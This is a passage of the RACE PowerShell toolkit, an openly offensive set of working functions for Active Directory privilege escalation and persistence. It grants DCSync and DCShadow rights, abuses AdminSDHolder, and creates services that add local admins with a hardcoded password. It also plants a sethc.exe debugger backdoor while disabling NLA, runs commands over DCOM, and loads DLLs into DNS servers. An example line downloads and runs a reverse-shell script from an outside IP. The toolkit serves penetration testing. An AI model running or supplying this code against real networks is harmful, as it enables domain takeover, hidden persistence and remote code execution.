$SamAccountName = @{ RoleCapabilities = $ConfigName };} Write-Verbose "Registering Session Configuration." Register-PSSessionConfiguration -Name $ConfigName -Path C:\ProgramData\$ConfigFile -Force } if ($ComputerName) { Invoke-Command -ScriptBlock $RemoteScriptBlock -ComputerName $ComputerName -Credential $Credential -ArgumentList $SamAccountName,$ConfigName,$Remove -Verbose } else { Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList $SamAccountName,$ConfigName,$Remove -Verbose } } function Set-ADACL { <# .SYNOPSIS Function to modify ACL of domain objects. .DESCRIPTION The function can set ACL of a domain object specified by TargetSamAccountName or DistinguishedName. It requires Microsoft's Active Directory module. You either need the AD RSAT tools (available on DC) or get the module from here: https://github.com/samratashok/ADModule This function is used by other functions like Set-DCPermissions. .PARAMETER TargetSamAccountName SamAccountName of the target user or group for which you want to modify the DACL. .PARAMETER DistinguishedName DistnguishedName of the target object for which you want to modify the DACL. .PARAMETER SamAccountName SamAccountName of the user or group which will have permissions. .PARAMETER Right Right which the Principal with SamAccountName will have on the target object. Default is GenericAll. .PARAMETER GUIDRight GUIDRight which the Principal with SamAccountName will have on the target object. .PARAMETER Type Type of ACE. Default is Allow. .PARAMETER Server Use this to specify a target domain or domain controller. .EXAMPLE PS C:\> Set-ADACL -SamAccountname labuser -TargetSamAccountName support1user -GUIDRight ResetPassword -Verbose Use the above command to modify ACL of the support1user to add permissions for labuser to Reset Password for it. It needs DA privileges or permissions (like OU Delegation) .EXAMPLE PS C:\> Set-ADACL -SamAccountName labuser -DistinguishedName 'DC=powershell,DC=local' -GUIDRight DCSync -Server powershell.local -Verbose Use the above command to modify ACL of the domain object powershell.local to add DCSync rights for 'labuser'. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 1, Mandatory = $False)] [String] $TargetSAMAccountName, [Parameter(Position = 2, Mandatory = $False)] [String] $DistinguishedName, [Parameter(Position = 3, Mandatory = $False)] [String] $SamAccountName, [Parameter(Position = 4, Mandatory = $False)] [String] [ValidateSet ("GenericAll","WriteDacl","WriteOwner","WriteProperty","ReadProperty","GenericWrite","ListChildren")] $Right = "GenericAll", [Parameter(Position = 5, Mandatory = $False)] [String] [ValidateSet ("DCSync","WriteMember","ResetPassword")] $GUIDRight, [Parameter(Position = 6, Mandatory = $False)] [String] [ValidateSet ("Allow","Deny")] $Type = "Allow", [Parameter(Position = 7, Mandatory = $False)] [String] $Server ) # Check if Active Directory Module is loaded if (!(Get-Module -ListAvailable -Name ActiveDirectory)) { Write-Warning "This function needs Active Directory module! Please import it or get it from https://github.com/samratashok/ADModule" } if ($TargetSamAccountName) { $objDN = (Get-ADUser -Identity $TargetSamAccountName).distinguishedname } elseif ($DistinguishedName) { $objDN = $DistinguishedName } else { Write-Output 'Cannot find the object.' } # Assign AD Drive $AD = 'AD' Write-Verbose "Getting the existing ACL for $objDN." if ($Server) { $AD = (New-PSDrive -Name 'AD1' -PSProvider ActiveDirectory -Server $Server -root "//RootDSE/").Name } $Path = $AD + ':\' + $objDN $ACL = Get-Acl -Path $Path $sid = New-Object System.Security.Principal.NTAccount($SamAccountName) if ($GUIDRight -eq "DCSync") { # DS-Replication-Get-Changes $objectGuidGetChanges = New-Object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 $ACEGetChanges = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$objectGuidGetChanges) $ACL.AddAccessRule($ACEGetChanges) # DS-Replication-Get-Changes-All $objectGuidGetChangesAll = New-Object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 $ACEGetChangesAll = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$objectGuidGetChangesAll) $ACL.AddAccessRule($ACEGetChangesAll) # DS-Replication-Get-Changes-In-Filtered-Set $objectGuidGetChangesFiltered = New-Object Guid 89e95b76-444d-4c62-991a-0facbeda640c $ACEGetChangesFiltered = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$objectGuidGetChangesFiltered) $ACL.AddAccessRule($ACEGetChangesFiltered) Write-Verbose "Setting ACL for ""$objDN"" for ""$SamAccountName"" to use ""$GUIDRight"" right." Set-Acl $Path -AclObject $ACL } elseif ($GUIDRight -eq "WriteMember") { # Write permissions for the Member property $MemberPropertyGUID = New-Object Guid bf9679c0-0de6-11d0-a285-00aa003049e2 $ACE = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'WriteProperty','Allow',$MemberPropertyGUID) $ACL.AddAccessRule($ACE) Write-Verbose "Setting ACL for ""$objDN"" for ""$SamAccountName"" to use ""$GUIDRight"" right." Set-Acl $Path -AclObject $ACL } elseif ($GUIDRight -eq "ResetPassword") { # Write permissions for the Member property $MemberPropertyGUID = New-Object Guid 00299570-246d-11d0-a768-00aa006e0529 $ACE = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$MemberPropertyGUID) $ACL.AddAccessRule($ACE) Write-Verbose "Setting ACL for ""$objDN"" for ""$SamAccountName"" to use ""$GUIDRight"" right." Set-Acl $Path -AclObject $ACL } else { $ACE = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,$Right,$Type) $ACL.AddAccessRule($ACE) Write-Verbose "Setting ACL for ""$objDN"" for ""$SamAccountName"" to use ""$Right"" right." Set-Acl $Path -AclObject $ACL } } function Set-DNSAbusePermissions { <# .SYNOPSIS Function to modify ACL of DNS Server Object and permissions for the DNS service. .DESCRIPTION The function modifies ACL of the DNS Server Object to add GenericRead and GenericWrite permissions to the user specified by SamAccountName. This function needs either Domain Admin privileges or administrator privileges on the DNS Server. It uses the Set-ADAcl function that requires Microsoft's Active Directory module. You either need the AD RSAT tools (available on DC) or get the module from here: https://github.com/samratashok/ADModule .PARAMETER SamAccountName SamAccountName of the user or group which will have permissions. .PARAMETER DistinguishedName DistnguishedName of the target DNS Server for which you want to modify the DACL. .PARAMETER Right Right which the Principal with SamAccountName will have on the target object. Default is GenericAll. .PARAMETER ComputerName Provide DNS Service restart permissions on the target computer. .EXAMPLE PS C:\> Set-DNSAbusePermissions -SAMAccountName labuser -DistinguishedName 'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell,DC=local' -ComputerName ops-dc -Verbose Use the above command to modify ACL of DNS Server to add permissions for labuser so that it can remotely load DLLs as SYSTEM on the DNS Server. Use the below command (needs DNS Server module that is available with DNS RSAT) to load the DLL. PS C:\> Invoke-DNSAbuse -ComputerName ops-dc -DLLPath \\ops-build\dll\mimilib.dll -Verbose .LINK https://github.com/samratashok/RACE https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html #> [CmdletBinding()] Param( [Parameter(Position = 1, Mandatory = $False)] [String] $SAMAccountName, [Parameter(Position = 2, Mandatory = $False)] [String] $DistinguishedName, [Parameter(Position = 3, Mandatory = $False)] [String] [ValidateSet ("GenericAll","WriteDacl","WriteOwner","WriteProperty","ReadProperty","GenericWrite","ListChildren")] $Right = "GenericAll", [Parameter(Position = 4, Mandatory = $False)] [String] $ComputerName ) # Provide Write Permissions for the provided user on DNS Server Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -Right GenericWrite # Provide Read Permissions for the provided user on DNS Server Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -Right ReadProperty # Provide Read Permissions for the provided user on DNS Server Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -Right ListChildren # Provide service restart permissions to the attacker controlled user Set-RemoteServicePermissions -SamAccountName $SAMAccountName -ComputerName $ComputerName -ServiceName DNS -Rights CCLCRPWP } function Set-DCPermissions { <# .SYNOPSIS Function to modify ACL of domain objects for specific attacks. .DESCRIPTION The function can set ACL of a domain object specified by TargetSamAccountName or DistinguishedName. It uses Set-ADAcl for most of the methods which requires Microsoft's Active Directory module. You either need the AD RSAT tools (available on DC) or get the module from here: https://github.com/samratashok/ADModule .PARAMETER Method Use one of the predefined ACL modification - 'DSRMAdmin','AdminSDHolder','UserControl','Delegation','DCSync','RBCD','GroupDACL' .PARAMETER Server Specify the target server or domain. If none is specified, the current domain is used. .PARAMETER TargetSamAccountName SamAccountName of the target user or group for which you want to modify the DACL. .PARAMETER DistinguishedName DistnguishedName of the target object for which you want to modify the DACL. .PARAMETER SamAccountName SamAccountName of the user or group which will have permissions. .PARAMETER Right Right which the Principal with SamAccountName will have on the target object. Default is GenericAll. .PARAMETER GUIDRight GUIDRight which the Principal with SamAccountName will have on the target object. .PARAMETER Type Type of ACE. Default is Allow. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER Remove Renove the ACL modifications. .EXAMPLE PS C:\> Set-DCPermissions -Method AdminSDHolder -SAMAccountName labuser -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Verbose Use the above command to modify ACL of the AdminSDHolder to allow labuser permissions to modify ACL of AdminSDHolder. Using these permissions, labuser can change ACL of AdminSDHolder and get rights over all the Protected Groups. .EXAMPLE PS C:\> Set-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' -SAMAccountName labuser -Verbose Use the above command to modify ACL of OPS-FILE$ user to add permissions for labuser to configure Resource-based Constrained Delegation. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] [ValidateSet ('DSRMAdmin','AdminSDHolder','UserControl','Delegation','DCSync','RBCD','GroupDACL')] $Method, [Parameter(Position = 1, Mandatory = $False)] [String] $Server, [Parameter(Position = 2, Mandatory = $False)] [String] $TargetSAMAccountName, [Parameter(Position = 3, Mandatory = $False)] [String] $DistinguishedName, [Parameter(Position = 4, Mandatory = $False)] [String] $SamAccountName, [Parameter(Position = 5, Mandatory = $False)] [String] $Principal, [Parameter(Position = 5, Mandatory = $False)] [String] [ValidateSet ("GenericAll","WriteDacl","WriteOwner","WriteProperty","ReadProperty","GenericWrite","ListChildren")] $Right = "GenericAll", [Parameter(Position = 6, Mandatory = $False)] [String] [ValidateSet ("DCSync","WriteMember")] $GUIDRight, [Parameter(Position = 7, Mandatory = $False)] [String] [ValidateSet ("Allow","Deny")] $Type = "Allow", [Parameter(Position = 8, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) switch($Method) { "DSRMAdmin" { $RemoteScriptBlock = { Param( [Parameter( Mandatory = $True)] [String] $SamAccountName, $Remove ) if (!$Remove) { # Check if the DsrmAdminLogonBehavior key exists. If note, create it. $DSRMAdminLogonBehaviorKey = 'HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior' if (!$DSRMAdminLogonBehaviorKey) { Write-Verbose "Creating $DSRMAdminLogonBehaviorKey on the DC." New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD } # Modify the permission of the Lsa key $RegKey = 'HKLM:\System\CurrentControlSet\Control\Lsa' Write-Verbose "Getting the existing ACL for $RegKey" $ACL = Get-Acl $RegKey # Provide minimum required permission to the user which we control $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'FullControl','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) # Set the ACL Write-Verbose "Setting ACL for $RegKey" Set-Acl $RegKey -AclObject $ACL } } Invoke-Command -ScriptBlock $RemoteScriptBlock -ComputerName $Server -Credential $Credential -ArgumentList $SamAccountName,$Remove Write-Output 'Use the below command for abusing the permissions.' Write-Output 'Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2' } "AdminSDHolder" { Write-Verbose "Modifying ACL of AdminSDHolder on the DC." Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -Right WriteDacl Write-Output 'Use the below command for abusing the permissions.' Write-Output "Set-ADACL -DistinguishedName $DistinguishedName -Principal $SAMAccountName -Right GenericAll -Verbose" } "UserControl" { Write-Verbose "Modifying ACL of $TargetSamAccountName on the DC." Set-ADACL -TargetSAMAccountName $TargetSamAccountName -SamAccountName $SAMAccountName -Right WriteProperty Write-Output 'Use the below command for abusing the permissions.' Write-Output "Set-ADUser -Identity $TargetSamAccountName -ServicePrincipalNames @{Add='dc/replication'}" } "DCSync" { Write-Verbose "Modifying ACL of Domain Object on the DC." Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -GUIDRight DCSync Write-Output "You can now execute the DCSync attack as $SAMAccountName." } "RBCD" { Write-Verbose "Modifying ACL of $DistinguishedName on the DC." Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -Right GenericWrite Write-Output "You can now abuse Resource-based Constrained Delegation on $DistinguishedName as $SAMAccountName." } "GroupDACL" { Write-Verbose "Modifying ACL of $DistinguishedName on the DC." Set-ADACL -SamAccountName $SAMAccountName -DistinguishedName $DistinguishedName -Right WriteDacl Write-Output "You can now modify ACL of $DistinguishedName as $SamAccountName." } } } function Set-DCShadowPermissions { <# .SYNOPSIS Function to modify ACL of multiple domain objects to allow DCShadow execution without Domain Admin privilges .DESCRIPTION The function can set ACL of multiple domain objects so that later while executing DCShadow, Domain Admin privileges are not required. To run DCShadow without using DA privileges following ACL modifications are required: - The domain object. DS-Install-Replica (Add/Remove Replica in Domain) DS-Replication-Manage-Topology (Manage Replication Topology) DS-Replication-Synchronize (Replication Synchornization) - The Sites object (and its children) in the Configuration container. CreateChild and DeleteChild - The object of the computer which is registered as a DC. WriteProperty (Not Write) - The target object. WriteProperty (Not Write) It uses Microsoft's Active Directory module. You either need the AD RSAT tools (available on DC) or get the module from here: https://github.com/samratashok/ADModule .PARAMETER FakeDC Use one of the predefined ACL modification - 'DSRMAdmin','AdminSDHolder','UserControl','Delegation','DCSync','RBCD','GroupDACL' .PARAMETER Object Specify the target server or domain. If none is specified, the current domain is used. .PARAMETER TargetSamAccountName SamAccountName of the target user or group for which you want to modify the DACL. .PARAMETER DistinguishedName DistnguishedName of the target object for which you want to modify the DACL. .PARAMETER SamAccountName SamAccountName of the user or group which will have permissions. .PARAMETER Remove Renove the ACL modifications. .EXAMPLE PS C:\> Set-DCShadowPermissions -FakeDC emptest -SAMAccountName testuser -Username privuser -Verbose Use the above command to modify ACLs to run DCShadow from ps-paw machine as privuser against testuser. .LINK https://www.dcshadow.com/ https://www.labofapenetrationtester.com/2018/04/dcshadow.html https://www.labofapenetrationtester.com/2018/05/dcshadow-sacl.html https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $FakeDC, [Parameter(Position = 1, Mandatory = $False)] [String] $Object, [Parameter(Position = 2, Mandatory = $False)] [String] $TargetSamAccountName, [Parameter(Position = 3, Mandatory = $False)] [String] $DistinguishedName, [Parameter(Position = 4, Mandatory = $False)] [String] $SamAccountName, [Parameter(Mandatory = $False)] [Switch] $Remove ) Write-Warning "This script must be run with Domain Administrator privileges or equivalent permissions. This is not a check but a reminder." $sid = New-Object System.Security.Principal.NTAccount($SamAccountName) function Get-Searcher { Param( [Parameter()] [String] $Name, [Parameter()] [String] $sn ) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $DomainDN = $objDomain.DistinguishedName $objSearcher = New-Object System.DirectoryServices.DirectorySearcher $objSearcher.SearchRoot = $objDomain if ($sn) { $strFilter = "(&(samAccountName= $sn))" } elseif ($Name) { $strFilter = "(&(Name= $Name))" } $objSearcher.Filter = $strFilter $SearchResult = $objSearcher.FindAll() $Object = [ADSI]($SearchResult.Path) $Object } # Provide minimal permissions required to register a fake DC to the specified username. $objDomain = New-Object System.DirectoryServices.DirectoryEntry $DomainDN = $objDomain.DistinguishedName $objSites = New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Sites,CN=Configuration,$DomainDN") $IdentitySID = $SID.Translate([System.Security.Principal.SecurityIdentifier]).value $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$IdentitySID) $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'All' $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow' $nullGUID = [guid]'00000000-0000-0000-0000-000000000000' $ACESites = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'CreateChild,DeleteChild','Allow','All',$nullGUID) $objSites.PsBase.ObjectSecurity.AddAccessRule($ACESites) # DS-Install-Replica $objectGuidInstallReplica = New-Object Guid 9923a32a-3607-11d2-b9be-0000f87a36b2 $ACEInstallReplica = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$objectGuidInstallReplica) $objDomain.PsBase.ObjectSecurity.AddAccessRule($ACEInstallReplica) # DS-Replication-Manage-Topology $objectGuidManageTopology = New-Object Guid 1131f6ac-9c07-11d1-f79f-00c04fc2dcd2 $ACEManageTopology = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$objectGuidManageTopology) $objDomain.PsBase.ObjectSecurity.AddAccessRule($ACEManageTopology) # DS-Replication-Synchronize $objectGuidSynchronize = New-Object Guid 1131f6ab-9c07-11d1-f79f-00c04fc2dcd2 $ACESynchronize = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'ExtendedRight','Allow',$objectGuidSynchronize) $objDomain.PsBase.ObjectSecurity.AddAccessRule($ACESynchronize) # Set Write permissions for the AD object of Attacker's machine which will be registered as DC $objFakeDC = Get-Searcher -Name $FakeDC $ACEFakeDC = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'WriteProperty','Allow') $ObjFakeDC.PsBase.ObjectSecurity.AddAccessRule($ACEFakeDC) # Set Write permissions for the AD object of the Target Object if ($Object) { $TargetObject = Get-Searcher -Name $Object } elseif ($TargetSamAccountName) { $TargetObject = Get-Searcher -sn $TargetSamAccountName } elseif ($DistinguishedName) { $TargetObject = New-Object System.DirectoryServices.DirectoryEntry($DistinguishedName) } $ACETarget = New-Object DirectoryServices.ActiveDirectoryAccessRule($sid,'WriteProperty','Allow') $TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACETarget) if (!$Remove) { Write-Verbose "Modifying permissions for user $SamAccountName for all Sites in $($objSites.DistinguishedName)" $objSites.PsBase.commitchanges() Write-Verbose "Providing $SamAccountName minimal replication rights in $DomainDN" # Modify the domain object ACL to include the replication ACEs $objDomain.PsBase.commitchanges() Write-Verbose "Providing $SamAccountName Write permissions for the computer object $($objFakeDC.DistinguishedName) to be registered as Fake DC" $objFakeDC.PsBase.commitchanges() Write-Verbose "Providing $SamAccountName Write permissions for the target object $($TargetObject.DistinguishedName)" $TargetObject.PsBase.commitchanges() } elseif ($Remove) { Write-Verbose "Removing the ACEs added by this script." $objSites.PsBase.ObjectSecurity.RemoveAccessRule($ACESites) $objSites.PsBase.commitchanges() $objDomain.PsBase.ObjectSecurity.RemoveAccessRule($ACEInstallReplica) $objDomain.PsBase.ObjectSecurity.RemoveAccessRule($ACEManageTopology) $objDomain.PsBase.ObjectSecurity.RemoveAccessRule($ACESynchronize) $objDomain.PsBase.commitchanges() $ObjFakeDC.PsBase.ObjectSecurity.RemoveAccessRule($ACEFakeDC) $objFakeDC.PsBase.commitchanges() $TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACETarget) $objFakeDC.PsBase.commitchanges() } } ###################### Functions to abuse persistence ###################### function Set-RemoteServiceAbuse { <# .SYNOPSIS Function used to abuse Serviecs settings modified by Set-RemoteServicePermissions. .DESCRIPTION The function configures the target service for payload execution once its permissions are changed. It needs the privileges of the Prinicpal for which permissions are added. Note that there will be System logs for service creation or config change. .PARAMETER ServiceName Name of the target service which is modified. Default is UpdateCheckService if a new service is created. .PARAMETER UserName Username of the user to be added using the payload. Default is localadmin. .PARAMETER Password Password of the user to be added using the payload. Default is Password@1234! .PARAMETER LocalGroup Localgroup to which the user specified by Username is added. Default is local administrators. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have implicit privileges. .PARAMETER Command The payload to be executed using target service. If this parameter is not used, a user add command is used. .PARAMETER CreateService use this for creating a new service. .PARAMETER SamAccountName The attacker controlled user. Any permissions change can be abused using this user. .EXAMPLE PS C:\> Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName scmanager -Verbose PS C:\> Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'ops\proxyuser' -CreateService evilsvc -SamAccountName labuser -Verbose In the above commands, the first command modifies the Security Descriptor of scmanager on the target machine. THe second command (which is a separate function) sets a payload for executable of 'evilsvc' service which adds 'ops\proxyuser' to the local administrators group. It also suggests to run the below command which provides 'labuser' the permission to modify 'evilsvc' Set-RemoteServicePermissions -SamAccountName labuser -ServiceName evilsvc -ComputerName ops-mssql PS C:\> sc.exe \\ops-mssql start evilsvc Run the above command as 'labuser' to execute the payload set as executable of evilsvc. .EXAMPLE PS C:\> Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName ALG -Verbose Use the above command to modify permissions for the 'ALG' service to give 'labuser' modify rights. PS C:\> Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'labuser' -ServiceName ALG -Verbose Run the above command as 'labuser' to configure ALG to run as SYSTEM and modify its executable path to add 'labuser' or other Principal provided in the UserName parameter to the local adminisrators group on the target machines. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $ServiceName = 'UpdateCheckService', [Parameter(Position = 1, Mandatory = $False)] [String] $UserName = 'localadmin', [Parameter(Position = 2, Mandatory = $False)] [String] $Password = 'Password@1234!', [Parameter(Position = 3, Mandatory = $False)] [String] $LocalGroup = 'administrators', [Parameter(Position = 4, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 5, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Position = 6, Mandatory = $False)] [String] $Command, [Parameter(ParameterSetName="CreateService",Mandatory = $False)] [Switch] $CreateService, [Parameter(ParameterSetName="CreateService",Mandatory = $False)] [String] $SamAccountName ) if ($Command) { $servicecommand = $Command } else { # Check if the username is a domain user. if($UserName.Contains('\')) { $servicecommand = "net localgroup $LocalGroup $UserName /add" } # Else create the user else { $ServiceCommand = "net user $UserName $Password /add" $ServiceCommandLocalAdmin = "net localgroup $LocalGroup $UserName /add" } } if (!$ComputerName) { $ComputerName = "127.0.0.1" } if ($CreateService) { # Create the service. This is useful when we have GA over scmanager. Write-Verbose "Creating service $ServiceName on $ComputerName." sc.exe \\$ComputerName create $ServiceName obj= "LocalSystem" binpath= "$servicecommand" start= auto # Add permissions for created service. Write-Output "Run the following command (need administrator privileges on $ComputerName) to get Restart rights or wait for $ServiceName to restart." Write-Output "Set-RemoteServicePermissions -SamAccountName $SamAccountName -ServiceName $ServiceName -ComputerName $ComputerName" # Start the service Write-Output "Run the below command as $SamAccountName after the above to abuse the service permission." Write-Output "sc.exe \\$ComputerName start $ServiceName" if ($ServiceCommandLocalAdmin) { # Reconfigure the service for second command Write-Verbose "Reconfiguring and starting service $ServiceName to execute $ServiceCommandLocalAdmin." sc.exe \\$ComputerName config $ServiceName binpath= "$ServiceCommandLocalAdmin" start= auto sc.exe \\$ComputerName start $ServiceName } } else { Write-Verbose "Configure service $ServiceName on $ComputerName." sc.exe \\$ComputerName config $ServiceName obj= "LocalSystem" binpath= "$servicecommand" start= auto # Start the service Write-Verbose "Starting service $ServiceName on $ComputerName to execute $servicecommand." sc.exe \\$ComputerName start $ServiceName #Restore } } function Invoke-RegistryAbuse { <# .SYNOPSIS Function to abuse permissions for Registry keys. .DESCRIPTION Use this function to abuse Registry key permissions modified by Set-RemoteRegistryPermissions. It needs the privileges of the Principal for which permissions are added. Currently, the function uses Remote Registry to modify the permissions. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have implicit privileges. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-RegistryImageFileExecution -SamAccountName labuser -ComputerName ops-mssql -Verbose Use the above command to modify permissions of the 'Image File Execution Options' key on the target machine to allow 'labuser' perrmissions to modify the key and its subkeys. PS C:\> Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose Above command sets payload for sethc and disables NLA. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 1, Mandatory = $False)] [String] [ValidateSet ('ImageFileExecution','RunKey')] $Method = 'ImageFileExecution', [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) Write-Verbose "Using $Method on $ComputerName." switch($Method) { "ImageFileExecution" { Write-Verbose 'Setting setch.exe keys' $RemoteRegKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', "$ComputerName") $sethc = $RemoteRegKey.CreateSubKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe') $sethc.SetValue('Debugger','C:\Windows\system32\cmd.exe') Write-Verbose 'Disabling NLA' $RemoteRegKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', "$ComputerName") $SubKey = $RemoteRegKey.OpenSubKey('SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp',$true) $SubKey.SetValue('SecurityLayer',0,[Microsoft.Win32.RegistryValueKind]::DWORD) } } } function Invoke-DCOMAbuse { <# .SYNOPSIS Function to abuse permissions of DCOM endpoint for command execution on the target machine. .DESCRIPTION Use this function to abuse DCOM permissions modified by Set-DCOMPermissions. It needs the privileges of the Principal for which permissions are added. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Method DCOM attack to be used for code execution. The default is MMC20 which makes use of MMC20.Application. .PARAMETER PayloadExecutable The executable to be used. Default is 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe ' .PARAMETER Arguments Argeument to be passed to the payload. Default is -ep bypass -noexit ps .PARAMETER Credential Credential for the target remote computer. Not required if you already have implicit privileges. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose Use the above command to add permissions on the target machine for labuser to execute commands using DCOM. Then use the below command as labuser to run commands:\ Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)' .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 1, Mandatory = $False)] [String] [ValidateSet ('MMC20','ShellBrowserWindow')] $Method = 'MMC20', [Parameter(Position = 2, Mandatory = $False)] [String] $PayloadExecutable = 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe ', [Parameter(Position = 3, Mandatory = $False)] [String] $Arguments = '-ep bypass -noexit ps', [Parameter(Position = 4, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) Write-Verbose "Using $Method on $ComputerName." switch($Method) { "MMC20" { [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "$ComputerName")).Document.ActiveView.ExecuteShellCommand("$PayloadExecutable", $null, "$Arguments", "7"); } } } function Invoke-DNSAbuse { <# .SYNOPSIS Function to abuse permissions of DCOM endpoint for command execution on the target machine. .DESCRIPTION Use this function to abuse DCOM permissions modified by Set-DCOMPermissions. It needs the privileges of the Principal for which permissions are added. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER DLLPath The UNC path to DLL which will be injected in the DNS service on the target machine. .PARAMETER Credential Credential for the target remote computer. Not required if you already have implicit privileges. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose Use the above command to add permissions on the target machine for labuser to execute commands using DCOM. Then use the below command as labuser to run commands:\ Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)' .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 1, Mandatory = $False)] [String] $DLLPath, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) # Check if DNSServer Module is loaded if (!(Get-Module -ListAvailable -Name DNSServer)) { Write-Warning "This function needs DNSServer module!" } Write-verbose "Configuring DNS Server $ComputerName to load DLL $DLLPath." $dllsetting = Get-DnsServerSetting -ComputerName $ComputerName -All $dllsetting.ServerLevelPluginDll = $DLLPath Set-DnsServerSetting -InputObject $dllsetting -ComputerName $ComputerName -Verbose Write-Verbose "Restarting DNS service on 